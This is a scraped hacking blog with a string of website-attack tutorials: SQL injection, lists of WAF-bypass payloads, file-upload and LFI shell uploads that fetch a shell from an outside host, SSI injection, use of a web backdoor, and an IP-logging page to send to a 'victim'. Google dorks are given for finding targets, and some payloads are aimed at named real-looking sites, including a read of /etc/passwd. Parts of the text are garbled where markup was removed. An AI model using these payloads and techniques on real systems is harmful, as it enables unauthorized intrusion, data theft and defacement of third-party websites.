All Hacking Tools And Hacking Tutorials Are Only For Education Purposes,..
Showing posts with label Website Hacking. Show all posts
Showing posts with label Website Hacking. Show all posts

How To Hack A Website With WebCruiser Scanner - FOCSoft

Hello Friends
              How To Hack A Website With WebCruiser Scanner
[*]Introduction
Welcome to my step by step tutorial on how to hack a website using WebCruiser Scanner.

As always I will try to explain it in the easiest way so it will be n00b friendly.

I suggest you to practice "hacking" manually as using tools wont make your skills go higher.

Whatsoever there are lazy-ass guys :P who find it better to perform these attacks by tools.

Ok , first of all we need to download WebCruiser Scanner.
                                            Download From Here !              _____________________________

[*] Let's start:

You will need a target , you can use google dorks to find vulnerable websites.

I won't bother on that part as there are billions of google dorks out there.

  OK, I found my vulnerable website:


Code:
http://www.target.com/vmarket.php?id=17

Let's open WebCruiser Scanner and check the target for vulnerabilities like on the picture below:

How To Hack A Website With WebCruiser Scanner - FOCSoft



Then click Scan Site.

How To Hack A Website With WebCruiser Scanner - FOCSoft


Now we will wait a minute or two , depends on you internet connection speed for the scan to finish , then we will see the results like the image below.



How To Hack A Website With WebCruiser Scanner - FOCSoft


As we can see the website is vulnerable to Sql injection & XSS.

We will perform a SQL injection this time.

[*] Attack
Right click on the vulnerable url and then SQL INJECTION POC , now you
just need to follow the steps below.

I have explained step by step with pictures so it will be easier for you to understand.

How To Hack A Website With WebCruiser Scanner - FOCSoft

How To Hack A Website With WebCruiser Scanner - FOCSoft

How To Hack A Website With WebCruiser Scanner - FOCSoft

How To Hack A Website With WebCruiser Scanner - FOCSoft

How To Hack A Website With WebCruiser Scanner - FOCSoft

How To Hack A Website With WebCruiser Scanner - FOCSoft



So that's all guys, we got the admin info in just 5 minutes :>

SQL Injection Complex Waf Bypassing - FOCSoft


 SQL Injection Complex Waf Bypassing


Hello Friends
Note: Before starting this topic, I want to clarify that I won't be covering on basic SQL Injection attacks. This article is meant for WAF /Filter bypassing during Injection.

What is WAF?

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and Cross Site Scripting (XSS) attacks.
  
How does it Work? 

When WAF detects any malicious input from end user, It gives  403 Forbidden, 406 Not Acceptable or any Kind of Custom errors 

 SQL Injection Complex Waf Bypassing

What to do next?


So, what to do next? we cant do our further injection right? 
Well its time to use various techniques to bypass thing. Some of these techniques are mentioned below:


# Case Changing:


Most of the Waf's only filter lowercase or higher-case keywords. We can easily evade that kind of wafs by using alternate case. 
if union select is forbidden , we can always try UNION SELECT instead. And if both does not work, We can try our luck with using mixture of both. like UniOn seLeCt

# Using Comments


SQL comments really help us in many cases. They play their important role in killing some Waf's Restrictions. e.g
                                            // , -- , --+ , #, -- - 

# Inline Comments


Some WAF’s filter keywords like /union\sselect/ig We can bypass these filters by using inline comments most of the time

http://localhost/waf.php?id=1 /*!union*/  /*!select*/ 1,2,3--
 SQL Injection Complex Waf Bypassing



Tip: Read SQLi Errors carefully. Sometimes they left error from which we can have idea that how waf is working on this site.

Anyways, We were talking about Filtered Keywords. So it does not mean  that waf is only filtering union select. It may be filtering all SQL keywords like table_name, column_name etc
So might need to apply these inline comments on those keywords as well. Example

http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,/*!table_name*/,4,5 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema*/=database()--

# Double use of Keywords


Sometimes WAF removes whole keyword from the query and execute it and throw errors
In such cases, we can use keywords in this way
http://localhost/waf.php?id=1 UNunionION SELselectECT 1,2,3,4,5,6--
Anyways It totally depends upon the scenario. Im just giving a common Idea. Rest is upon you that how you use it.

# Using Different types of Whitespaces

Sometime Waf may be filtering the whitespace we are using between keywords. We mostly use Spaces But space is not the only whitespace we can use in SQL injection. We have some other options as well
  for example + . 
%20 is use for space, but we can try using one of these whitespaces . some examples are %09  %0A  %0B %0C %0D %A0

inurl: 
 union%0Bselect%0B1,2,3--

# Encoding


We can always try our luck with URL encode thing to bypass WAF. For example we can use 
union select 1,/*!table_name*/,3 from information_schema.tables where table_schema=database()
 as 
 union%20select%201,%2f%2a%21table_name%2a%2f,3%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29
but sometime waf filter also filter % itself. So we have to use double URL encoding in that case

 union%2520select%25201,%2f%2a%21table_name%2a%2f%2520,3 from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529

# Unexpected Input


This scenario is very rare that we have to use buffer overflow or give unexpected query /request  to trick WAF filters.
for example:

http://localhost/waf.php?id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) union select 1,2,3,4,5--
 This thing only worked once for me. But knowledge is Power, may be you face any scenario that can be bypassed by using buffer overflow


# use all above mentioned techniques together 


ah.. tried all those things but still its showing NOT ACCEPTABLE or FORBIDDEN. well its time to use all these above mentioned techniques combined.
For example: you can use alternative cases with inline comments or obfuscation.

#Some Common Union Select Solutions: 


 %55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
 I hope you have enjoyed this article. Please give us your feedback. So that we maybe able to make things more clear for you next time.

SQL Injection With HTML Tags - FOCSoft


 .
Hello Friends
Today i will guide you on how to perform SQL Injection with html tags,
In Other words, we put html tags together with our sqli query to be executed.


 SQL Injection with HTML Tags


This you need first Before starting

  • A SQLI Vulnerable site.
      (in my case im using DVWA PenLab)

  • Bare Hands :)

Step 1,


Go to mozilla ang type 127.0.0.1
Sign in to DVWA with default Login details
" admin:password"

Step 2
Step go to DVWA Security, Change it To Low.
save it, Then Go to SQL Injection

Step 3
Find how many columns
so yeah, The column numbers are 2
so lets try union select query to get the columns

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires' UNION SELECT 1,2--+&Submit=Submit#

 SQL Injection with HTML Tags

Now the 1and 2 columns appeared


Then
Get the basic info column.


http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires' UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2--+&Submit=Submit#

So the 1 and 2 column appeared.

Now, it is time
Lets add now the HTML tags. Follow the query.
"Dont worry, if you find hard to get this, there's a video tutorial at the end of this tutorial"

Code:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires' UNION SELECT group_concat(0x

Injected by Sp4nkwires,0x
,user(),0x,0x
,database(),0x,0x,version(),0x),2--+&Submit=Submit#


 SQL Injection with HTML Tags

Now
My HTML Syntax before converting to HEX (Just to show you guys what I'm doing, It will not work You have to Convert it to HEX)

After Converting to hex

Code:

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires' UNION SELECT group_concat(0x3c62723e3c62723e3c623e3c666f6e742073697a653d22362220636f6c6f723d22677265656e223e496e6a6563746564206279205370346e6b77697265733c2f623e3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22626c7565223e,user(),0x3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22726564223e,database(),0x3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22626c7565223e,version(),0x3c2f666f6e743e),2--+&Submit=Submit#



Now, you can Modify you html tags and add more content.. like this.

Code:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires' UNION SELECT group_concat(0x

Injected by Sp4nkwires
,0x
Current User::,user(),0x,0x
Current Database::,database(),0x,0x
MySQL Version::,version(),0x),2--+&Submit=Submit#

 SQL Injection with HTML Tags

After Hexing

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires' UNION SELECT group_concat(0x3c62723e3c62723e3c623e3c666f6e742073697a653d22362220636f6c6f723d22677265656e223e496e6a6563746564206279205370346e6b77697265733c2f623e3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22626c7565223e43757272656e7420557365723a3a,user(),0x3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22726564223e43757272656e742044617461626173653a3a,database(),0x3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22626c7565223e4d7953514c2056657273696f6e3a3a,version(),0x3c2f666f6e743e),2--+&Submit=Submit#

File Upload Vulnerability - FOCSoft


Hello Friends
Well do you know the most easiest & common way to hack a site is Shell Upload. To be honest i'm not going to teach you to hack any site or server, I'm just sharing what I know besides hacking is really very cool, when you learn new things.

What Do I Need ?

DVWA Penetration Testing Lab
Burp Suite or (Live HTTP Headers)
Recommended - Mozilla Firefox
Any PHP File or Shell
Brain, Curiosity & Patience

Description & Methodologies

File Upload Vulnerability, allows an attacker to upload any scripted (static or dynamic) files on target server. (It's really very dangerous) Assume you create a Site in PHP / MySQL. You also create simple Image Uploading Application so users can upload their own image file, but without any validation yours application blindly trusts on users file and upload it on your server.

So what if an evil minded hacker like you determine it and upload .PHP file instead of Image file ?, Well your application will accept it & store it in server, Now an attacker will locate that file into Browser and it will be executed as .PHP scripted file, through this an attacker can also upload malicious shells and get complete access to Database & Server.

Go on & Learn This Holy Hacky Method!


1. Start DVWA, Put Security to Low Level, & Click on Upload.

2. First we'll exploit easy application, that doesn't validates user's file. Well you can also go through 'View Source', to understand how it really works.



3. So first of all let's exploit LOW LEVEL security. There's an application that allows you to upload image file. Click on Browse choose your any PHP or HTML scripted file (Like deface page or HACKED!) well you can also use any Shells like C99. Remember there's no security on EASY Level, it'll blindly trust on your file and upload it on it's server directory. It will be little hard on Medium Level.
Below i'm using simple 'HACKED' page

I've named it w0rm.php on my desktop and here i upload it on dvwa.



4. Click on upload and it'll show you a successfully uploaded message with file directory! wow that's amazing let's locate that file into browser. Copy that directory location and run it in your browser after dvwa path.



Now check the result, poor DVWA... hahaha no issue!

5. So we've successfully exploited easy level. Well an attacker can also upload dangerous shells that can completely take over server, data and even rooting an entire server. So let's move on little hard stage. (Change Security level to Medium). Now try to upload the same file in Medium Level and observe what's the result. Well you'll get an error message on top - that your image was not uploaded.. Because it's not an image. Now switch to firefox with Tamper Data Addon to modify headers while transmission.

6. It's time for little trick : Rename your file with w0rm.php.jpg to confuse interpreter.

7. Up till now we didn't trapped any GET or POST request but now we'll do it, now again try to upload it but before clicking on upload start Tamper Data and click on Start Tamper to trap every request.


8. "Start Tamper" and click on Upload. And suddenly you'll get a pop-up - Click on Tamper : (Now we've to modify POST data)

9. Now Look into POST_DATA - Yes! we've to modify that stuff only, Just go in that text-area and search for your file name - at last change it to w0rm.php from w0rm.php.jpg and click on OK- [That's called BYPASSING application validation]

10. You'll see a successfully uploaded message, again locate it in your browser and watch.. IT'S HACKED! [Cool isn't it ?]

How Tto Hack Any Computer/Friends IP Address - FOCSoft


 How Tto Hack Any Computer/Friends IP Address - FOCSoftDo you know what your IP address means? Are you aware that your IP address is exposed every time you visit a website? Many websites and hackers use IP address to monitor your geographic position and/or anything that might link to you and other personal information. Your IP address is your online identity. An IP address can be used by hackers to break into your computer, steal personal information, launch attacks that might completely distort your computer's system.

How To Steal An IP Address

You can now get anyone's IP address using a very simple and straight forward script. Just follow the instruction's below.

1. First you need to have a php enabled hosting site. Below is a list of free php hosting sites

2. Now create a php script using notepad on your computer. Simply copy and paste the script below into your notepad and save it as index.php.
Paste This Code In It


$file = "code7.txt";
$f=fopen($file, 'a');
fwrite($f,$_SERVER['REMOTE_ADDR']."\n");
fclose($f);
?>
File not found

 
4. Now upload the two files (index.php and code7.txt) to your web hosting site (my3gb.com).
 
                          How Tto Hack Any Computer/Friends IP Address - FOCSoft

5. The link to your php script that you need to send to your victim will therefore be....
                                     ''www.username.my3gb.com/index.php'' 
6. Once your victim clicks on the above url, he will be redirection to a page ''File not found'' while his IP address will be logged in the file ''code7.txt'' 
 
That is why it is highly advised to conseal your IP whenever you are surfing the net. This can be done with the help of IP hiding software like Easy-hide ip address, Superhide IP address e.t.c
 
Apart from IP hiding software, you can also use free online annonymisers at..
 1. http://hidemyass.com   
 2. www.onlineanonymizer.com  
Stay safe!!! if you know to hack, you will know how to protect....!

Any Website Full Path Disclosure [Basic Tutorial] - FOCSoft

SalaM And HellO, FOCSoft Readers!
In This Post I Will Teach You The Most Simple Way Of Getting The Full Path Of A Site.. Its Usually Used For LFI And Also Used To Shell Site via SQLi..


So Here We Go, We Have A Site Like This :
www.netb00m.com/index.php?page=about

And We Change That Link Into :
www.netb00m.com/index.php?page=[]about

Then We Will Get The Full Path :
Warning: opendir(Array): failed to open dir: No such file or directory in /home/example/htdocs/index.php on line 84
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/netb00m/index.php on line 131

vBulletin x.x.x Customer Area Hacking 0day - FOCSoft

Asslam O Alikum Friends,..


Today Is Our Hacking Topic Is(vBulletin x.x.x Customer Area)

1st find a vBulletin 4 or 5 target
2) Make sure it has a /install/upgrade.php file in it
3) Go to site.com/install/upgrade.php and right click the page and see source code.
Find var CUSTNUMBER =
4) Once found , copy it
5) Then open http://pastebin.com/ZTEC6tgr

save as .php and upload to any host
6) After that paste that CUSTNUMBER into the Customer I.D box (It will be something like 9c4818514a74338f980793e7426b2fb1)
7) Fill in the other box's such as site URL, Username, Password and Email.
8) Once done, click Inject Admin and let the page load
9) Thats all, now go to the forum and login with the login details which you injected the site with.

Have fun

How to patch the bug ? Remove the install dir

                          Regards
TEAM_CC (Cyber Commondos)

How To Upload Shell Via LFI Vulnerability - FOCSoft


 

Assalam O Alikum Friends,..
Today I Am Going To Teach You Two Ways Of Uploading Shell Via LFI Vulnerability
Requirement:- website vul to lfi.
MethoD 1:-
NOTE: You will need FireFox and its
addon Tamper Data to do this
method! :)

LFI or Local File Inclusion allows you
to include a local file(which means,
that the file is stored on the server)
and run it in a webscript.
In this method we are going to
upload a shell by accessing the proc/self/environ.
Now we have our page:-
http://www.target.com/index.php?
include=register.php
And now we are going to do this:-
http://www.target.com/index.php?
include=../
If it gives you an error message , this
is good. Best thing that can happen is, it says "No such file or directory".
But anyways, now add this to your url:-
http://www.target.com/index.php?
include=../etc/passwd

And as long as there is no text other
than an error message on the page,
keep adding "../" to the URL, so it would be like:
http://www.target.com/index.php?
include=.../passwd
http://www.target.com/index.php?
include=.../passwd
http://www.target.com/index.php?
include=.../passwd

And so on. Now let's say we got to this URL:-
http://www.target.com/index.php?
include=.../passwd

And we see some huge shitty text we
can not handle with. Now change the
etc/passwd in the URL to proc/self/environ so it would look like this:
http://www.target.com/index.php?
include=...environ

If you see some text, you did good, if
you see an error message you did
bad. Now this is the point where we
use Tamper Data. Start you Tamper
and reload the page, and for user
agent you type in the following PHP script:-

PHP Code:-

("shell.php" ,"w
+"); $stream = fopen ( "http://
www.website.com/
yourshell.txt" , "r" ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>

This will execute the PHP script on
the site and create a shell.php on the
server. Why? Because the user agent
is being displayed on the webpage,
and if you put in a webscript for that, it will execute it.
Now simply access your shell by going to
http://www.taget.com/shell.php
And rape the server.
Now LFI method 2:-
NOTE: This only works on apache servers!
Alright you get back to the point
where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd,
you will try to get access to apache/
logs/error.log
If you have a brain, you should know
how to do that, since it's EXACTLY
the same method as on etc/passwd
(explained in LFI method 1).
Now when you have found the file,
open up cmd and type in
Code:
telnet http://www.tagrget.com
80
When you are inside the telnet, you
copy the following code (you use your
own shell url:
PHP Code:

("shell.php" ,"w
+"); $stream = fopen ( "http://
www.website.com/
yourshell.txt" , "r" ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>
Paste it into the telnet window, and
press enter once or maybe twice(until
you get an error message).
Now refresh the page in the browser
(error.log) once and there you go.
The PHP script will be executed and
your shell will get uploaded to the
server.
Access it by typing in the
following into your browser:-
http://www.taget.com/shell.php
ENJOY...

SSI Server Side Include Injection Shell - FOCSoft

Assalam O Alikum Dear Friends
SSI (server side include) is a web application exploit, you can put your codes remotly to vulenrable websites,
Server-side Include allowed you to upload files in multi extentions, but in .php extention you can't excute your shell, you have to rename shell.txt to shell.php
Lets Begin ...

Dorks :


inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=




Try any dork or find sites manually,
To check vulenrablity of websites enter these commands in username and password




It Will show the Date





It Will display which user is running on the server



 (Linux)


it Will show all files in the directory


(Windows)


it Will display all files in the directory


[Image: 0.png]





for example enter


in username and password to view all files of website


now we have to upload our deface page or shell
to upload a deface page, host/upload your deface page anywhere
you can use pastehtml.com for it,
then enter this command in username and password




to view your deface page goto site.com/deface.html

to upload a shell on website you have to host your shell anywhere in .txt format
then enter this command in login





to check your txt file is uploaded or not list all files using



now you have to chnage .txt extention to .php
to rename your txt file to php use this command


now goto site.com/abc.php and acess your shell

Web Application Firewall Bypassing Methods - FOCSoft

Basic Of Advanced WAF Bypassing Methods
Assalam 0 Alikum
Dear
...:::Friends & Visiters:::...
[Image: firewall.png]

What is WAF ?
WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections!

Let’s Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).
Example:
(m) or Sad|)


http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….
(We get a 403 Error!)

Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF…

1) Comments:
You can use comments to bypass WAF:

http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….
(First Method that can Bypass WAF)

However, most WAF identify this method so they still show a “Forbidden” Error…

2) Change the Case of the Letters:
You can also change the Case of the Command:

http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
(Another Basic Method to Bypass WAF!)

However, as before, this trick is also detected by most WAF!

3) Combine the previous Methods:
What you can also do is to combine the previous two methods:

http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….

This method is not detectable by many Web Application Firewalls!

4) Replaced Keywords:
Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:
 
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
(The “union” and the “select” will be removed, so the final result will be: “UNION SELECT” :-D )

This method doesn’t work on ALL Firewalls, as only some of them remove the “UNION” and the “SELECT” commands when they are detected!

5) Inline Comments:
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:

http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…
(The %55 is equal to “U” and %53 to “S”. See more on the Advanced Section….)

I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…


Advanced Methods:
Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….

(( You can test if the WAF can be crashed by typing:
? (hug)page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….

If you get a 500, you can exploit it using the Buffer Overflow Method! ))

2) Replace Characters with their HEX Values:
We can replace some characters with their HEX (URL-Encoded) Values.
Example:

http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
(which means “union select”)

Text to Hex Encoder (Choose the “Hex Encoded for URL” result!):
 http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:

COMMAND | WHAT TO USE INSTEAD
rapper
Code:
@@version       | version()
concat()           | concat_ws()  --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()
Learning MySQL Really helps on such issues! ;-)

4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:

This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:

http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…

(If the Firewall removes the “*”, the result will be: 15+union+select….)
So, if you find such a silly function, you can exploit it, in this way! :-D

[+] In addition to the previous example, some other bypasses might be:

Code:
-15+(uNioN)+(sElECt)….

-15+(uNioN+SeleCT)+…

-15+(UnI)(oN)+(SeL)(ecT)+….

-15+union (select 1,2,3,4…)
 
 
If You Need Any Kind Help, Reply Here

How To Hack .asp .aspx Website - FOCSoft

A Website Hacking Tutorial.How To Hack ASP Sites.
First You Need To Find The Website Upload Path to Upload Shell.
For That Use Google Dorks.
 
Google Dorks:
inurl:uploadimages.asp
inurl:uploadlogo.asp
inurl:uploadpictures.asp
inurl:uploadgallery
inurl:uploadfile.asp
inurl:uploadtest.asp
intitle:Test Free ASP Upload

You Can Use "allinurl" Instead of "Inurl" In Google Dorks.
Type the Above Dorks In Google Search Box.

Shell File To Upload:
Download The Best ASP Shell Here :
 
https://hotfile.com/dl/141216831/ed98a70/Shell.zip.html
or
https://www.dropbox.com/s/i2t3zbgv87lgroq/Umer.asp
Its My Favorite Shell.


Uploading Shell:
* After Searching Google Will Gives Lot of Results.Our Vul Link Should Look like This :
http://www.sites.com/images/uploadimages.asp 
 [Not For All Just Example]

* Open The Link You Will Find the Upload Path.Upload The Download Shell As The Following Formats:
shell.asp;me.jpg
shell.asp
shell.asp.jpg
shell.asp.jpg

* After Uploading You Will Get Result Message Like This :"File Uploaded Successfully"
* Now You Want to Find The Shell Link Where it is Uploaded.
* There is a Best Tool In Our Body.Which is Our Brain.Use Your Brain and A Tool Called;
  Acunteix Web Vulnerability Scanner.Download The Scanner Here :
 http://www.softgenius.co.in/2011/12/acun...er-70.html
* The Scanner Will Show All The Dir in the Site.
* Find the Uploaded Shell And Execute.That All Done. Cool
Shell link Looks Like :  
  [Just Example Not For All Sites]
 
If You Need Help, Reply Here,..

WeBaCoo Web Backdoor Tutorial - FOCSoft

 Assalam O Alikum Dear Friends
WeBaCoo Web Backdoor


[Image: psql-cli_1.png]

1. Get the WeBaCoo
- git clone

https://github.com/anestisb/WeBaCoo webacoo
- cd webacoo
- ./webacoo.pl -h

2. Generate php backdoor file

./webacoo.pl -g -o backdoor.php
 
3. upload to victim

4. Use WeBaCoo connect to backdoor

./webacoo.pl -t -u http://victim/backdoor.php
 
5. Now you are in the victim console, do whatever you want  . 
 
 
If You Need Any Kind Help, Reply Here,..

Joomla Brute Force Attacker PHP Joomla Brute Attacker PHP Script Script - FOCSoft

Assalam O Alikum Friends
Joomla Brute Force Attacker PHP Script


[Image: BruteForce%2BAttack%2BHackw0rm.jpg]

Downloading LINK pacman


 
IF You Need Any Kind Help, Reply Here....

XAMPP All Version Local Write Access Vulnerability - FOCSoft

Assalam O Alikum Friends
Today Topic Is Related To "XAMPP" 
 
 

All Version Local XAMPP Vulnerability Okay Direct Write Access Only

inurl :/ xampp / lang.php
inurl :/ security / lang.php

Exploit:


http://site.com/xampp/lang.php?testtest
http://site.com/security/lang.php?testest

Find Target On Google
For Example:

http://la-sofia.com/xampp/lang.php
Insert Exploitnya Example:
http://la-sofia.com/xampp/lang.php?Hacked_By_Name*

SQL Injectin Tips - FOCSoft


Assalam O Alikum
FOCSoft Friends, Readers
Tips/Tutorial By  ..:::Şhâhbâz:::..

In this Article I will give You Some SQL Injection Tips.....

Tip 1: avoid use of qoutes '' "

When we are injecting a website and we reached a point where we need to use where clause and give input data, for example we are tyring to find column names of table admin we mostly use This Method,..

select column_name from information_schema.tables where table_name='admin'

But it don't work all the time.. what to do next?

we can avoid use of quotes .. we can use hex values instead.. or convert the string in MySQL char
we use hackbar > SQL > MySQL char for it



Or
 
we can use encode options in hackbar Encoding>Hex Encoding>string to 00ff00ff
when you input string it will like "61646d696e"
we have to add 0x before it and make it like 0x61646d696e
and then add it in our query that will look like

 
select column_name from information_schema.tables where table_name=0x61646d696e
 
Tip 2; SERACH TABLE NAMES FOR SPECIFIC COLUMN:

You inject a website with a big and awkward database , You get lots of table names and you
  don't know which table might contain login details
so what you gonna do with it Big Grin
usually you retrieve table name and then move to columns to find Login records
but in this case Big Grin we will scan all table name for some specific column in all databases
lets say our specific column is "user"
so to find out what table name contain this column we will use query like


UNION SELECT table_name From Information_Schema.columns where column_name="user"
or
If it don't work we can hex column name (in our case, hex of password is 0x75736572)

SELECT table_name From Information_Schema.columns where column_name=0x75736572
 
Live Demo:,..

http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,concat(0x3c2f7469746c653e,group_concat(table_name))+from+inform ​ation_schema.columns where column_name=0x75736572

[Image: x9g0.png]

this query will look in all databases but if you want to search in current database you can add AND condition in query and make it look like


UNION SELECT table_name From Information_Schema.columns where column_name=hex_of_column_name and table_schema=database()




Tip 3; Testing if your current db user can write/read permissions?

First you need to check the database user
you can find it using user()
and query will return data like root@localhost, user@localhost or just user / anything



So you got username whats next?
how to check if user have read write permissions?
easy
use this query

select file_priv from mysql.user where user='username'
 
sometimes you need to avoid quotes and use hex instead

live Demo:,..


http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,group_concat(file_priv)+from+mysql.user where user=0x637365

Tip 4; LIVE DEMO OF READING /etc/password




http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,concat(0x3c2f7469746c653e,LOAD_FILE(0x2f6574632f706173737764))--


Tip 5; What Next If You Got Write Permissions ???
If you got write permissions we can write our shell in any writable directories of website but how ??
using out file function  but how to use it?




SELECT '' INTO OUTFILE '/var/www/dir/mad.php'

NOTE: /var/www/dir/mad.php is just an imaginary directory for this article .. you have to find root path yourself  :)

  Tip6; How To Access The Shell?

just go to dir you provided like this

yourwebsite.com/dir/mad.php?mad=whoami

SQLi Base64 Encoded Queries Video Explanation - FOCSoft


.:::Assalam O Alikum Dear :::.
 FOCSoft Friends, Visiters, Readers, & Friends


Tutorial By .:::Şhâhbâz:::.      

In This Video We Have Used Base64 Encrypted Queries To Inject Website
If You Love SQLi, Then Must Watch IT.
                    Download Video From Here
                                             Download From Here
If You Want Any Kind Any Kind Help, Reply Here

Web Hacking With Sql Injection Tutorial - FOCSoft


Assalam () Alikum
Şhâhbâz here from Cyber Comondos Smile


We see how we create databases,tables,columns, and add record in it in different ways and now
in this article , we will be covering on SQL injections ... how we can hack using sql injection

please Comments Here if you like it .. it took my 1,1/2 hour to complete
what is sql injection???
SQL injection is a very common method of hacking websites..
well, sql injection is a big thing, newbies think that this is not a big
deal, as they can exploit this vulnerability with scripts like
sqlmap, havij , sqlninja other kiddies scripts
but SQL injection can be a huge thing that it can took many books to complete

 
So what you can DO with SQL injection
You can access records,
you can modify records
you can bypass Login areas
You can breach sql server

okay here our first step begins

Finding Vulnerable websites.
well..if you are a hacker..You must know that
search engines are your best friends...

we can find vulnerable websites
using google dorks...?
common dorks are
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=

Now if you search anyone of these.. you will find many websites,,, open any of them
and you will see url like


www.website.com/index.php?id=1
this could be random
okay to test that if site is vulnerable, just put a ' at the end of url
and make it look like


www.website.com/index.php?id=1'

and if you see some error like this

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
or
Warning: mysql_fetch_array()

or any mysql error... etc or if you see any content of page missing
then the site is vulnerable

example

[Image: lgtf2af.png]

you see its mysql error..so the website is vulnerable Smile

So now lets move to next step

EXPLOITING the vulnerability

now so we have find vulnerability website..its time to fetching secret data Big Grin

so what is our next step Smile to find the number of columns in the table

for that we replace ' with order by statement

like This
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--

we need to increase the order by number till we get some error like
unknown column numbers or we found some content missing in the page

for example,

http://www.cementcorporation.co.in/page.php?id=20 order by 1-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 2-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 3-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 10-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 20-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 21-- ERROR / CONTENT MISSING IN PAGE

SO NOW WE SEE THAT WE GOT ERROR AT ORDER BY 21 , BUT NO ERROR AT ORDER BY 20,
SO THAT MEANS WE HAVE 20 COLUMNS Wink

some times this thing never works, we don't get error even at order by 1000
in that case we put ' at the end of id / parameter and put + at the end
like

http://www.cementcorporation.co.in/page.php?id=20' order by 21--+ error

now next step begins Big Grin

